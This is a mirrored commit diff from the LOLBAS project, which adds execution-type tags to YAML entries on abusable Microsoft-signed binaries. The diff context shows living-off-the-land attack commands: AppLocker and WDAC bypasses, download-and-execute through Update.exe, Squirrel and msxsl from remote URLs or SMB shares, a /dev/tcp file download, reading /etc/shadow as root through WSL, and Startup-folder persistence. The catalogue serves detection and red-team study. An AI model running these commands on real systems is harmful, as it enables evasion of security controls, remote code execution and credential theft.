public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Adding Execute tags to most LOLBas (#405)

Browse Source
This commit is contained in:
hegusung
2024-12-29 18:31:01 +01:00
committed by GitHub
parent baaa5bbc73
commit b9a6cd6a87
129 changed files with 520 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OtherMSBinaries/AccCheckConsole.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
- Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
- Execute: DLL (.NET)
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

5
yml/OtherMSBinaries/Adplus.yml
View File

@@ -18,6 +18,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: All Windows
Tags:
- Execute: CMD
- Command: adplus.exe -c config-adplus.xml
Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
@@ -32,6 +34,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: All windows
Tags:
- Execute: CMD
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

4
yml/OtherMSBinaries/Agentexecutor.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
Code_Sample:

4
yml/OtherMSBinaries/Appcert.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
Usecase: Execute custom made MSI file with malicious code
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1218.007
OperatingSystem: Windows
Tags:
- Execute: MSI
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe
- Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe

6
yml/OtherMSBinaries/Appvlp.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: CMD
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

2
yml/OtherMSBinaries/Bginfo.yml
View File

@@ -49,6 +49,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Execute: Remote
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@@ -58,6 +59,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Execute: Remote
Full_Path:
- Path: no default
Detection:

6
yml/OtherMSBinaries/Cdb.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: Shellcode
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
@@ -20,6 +22,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CMD
- Command: cdb.exe -c C:\debug-script.txt calc
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
@@ -27,6 +31,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

2
yml/OtherMSBinaries/Coregen.yml
View File

@@ -20,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1055
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
Usecase: Execute DLL code

2
yml/OtherMSBinaries/Csi.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

2
yml/OtherMSBinaries/DefaultPack.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample:

3
yml/OtherMSBinaries/Devinit.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: Remote
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\Tools\devinit\devinit.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\Tools\devinit\devinit.exe

4
yml/OtherMSBinaries/Devtoolslauncher.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- Execute: CMD
Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample:

2
yml/OtherMSBinaries/Dnx.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:

8
yml/OtherMSBinaries/Dotnet.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- Execute: DLL (.NET)
- Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 and up with .NET Core installed
Tags:
- Execute: CSharp
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:

2
yml/OtherMSBinaries/Dxcap.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\dxcap.exe
- Path: C:\Windows\SysWOW64\dxcap.exe

4
yml/OtherMSBinaries/Fsi.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
Full_Path:
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

4
yml/OtherMSBinaries/FsiAnyCpu.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:

4
yml/OtherMSBinaries/Mftrace.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe

2
yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe

4
yml/OtherMSBinaries/Msdeploy.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe
Description: Copy file from source to destination.
Usecase: Copy file.

10
yml/OtherMSBinaries/Msxsl.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
@@ -25,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
@@ -32,6 +39,9 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>
Description: Using remote XML and XSL files, save the transformed XML file to disk.
Usecase: Download a file from the internet and save it to disk.

2
yml/OtherMSBinaries/OpenConsole.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe

4
yml/OtherMSBinaries/Rcsi.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
- Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:

7
yml/OtherMSBinaries/Remote.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
@@ -25,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Execute: Remote
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

2
yml/OtherMSBinaries/Sqlps.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe

2
yml/OtherMSBinaries/Sqltoolsps.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample:

12
yml/OtherMSBinaries/Squirrel.yml
View File

@@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -25,6 +28,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -32,6 +38,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -39,6 +48,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe'
Code_Sample:

2
yml/OtherMSBinaries/Te.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: te.exe test.dll
Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.
Usecase: Execute DLL file.

6
yml/OtherMSBinaries/Teams.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Node.JS
- Command: teams.exe
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
Usecase: Execute JavaScript code
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Teams.exe'
Code_Sample:

33
yml/OtherMSBinaries/Update.yml
View File

@@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -25,6 +28,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -32,6 +38,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -39,6 +48,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -46,6 +58,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -53,6 +68,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
@@ -60,6 +78,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -67,6 +88,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -74,6 +98,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
@@ -81,6 +108,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
@@ -88,6 +117,8 @@ Commands:
Privileges: User
MitreID: T1547
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
@@ -95,6 +126,8 @@ Commands:
Privileges: User
MitreID: T1070
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
Code_Sample:

4
yml/OtherMSBinaries/VSDiagnostics.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
Usecase: Proxy execution of binary with arguments
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Detection:

2
yml/OtherMSBinaries/VSIISExeLauncher.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 and up with VS/VScode installed
Tags:
- Execute: EXE
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:

2
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: .NetObjects
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\UIAVerify\VisualUiaVerifyNative.exe

5
yml/OtherMSBinaries/VsLaunchBrowser.yml
View File

@@ -20,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
@@ -27,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Execute: Remote
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe

2
yml/OtherMSBinaries/Vshadow.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\vshadow.exe
Detection:

2
yml/OtherMSBinaries/Vsjitdebugger.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\vsjitdebugger.exe
Code_Sample:

2
yml/OtherMSBinaries/Wfc.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: XOML
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:

6
yml/OtherMSBinaries/Wsl.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: EXE
- Command: wsl.exe -u root -e cat /etc/shadow
Description: Cats /etc/shadow file as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: CMD
- Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: CMD
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file

2
yml/OtherMSBinaries/winfile.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\winfile.exe
- Path: C:\Windows\winfile.exe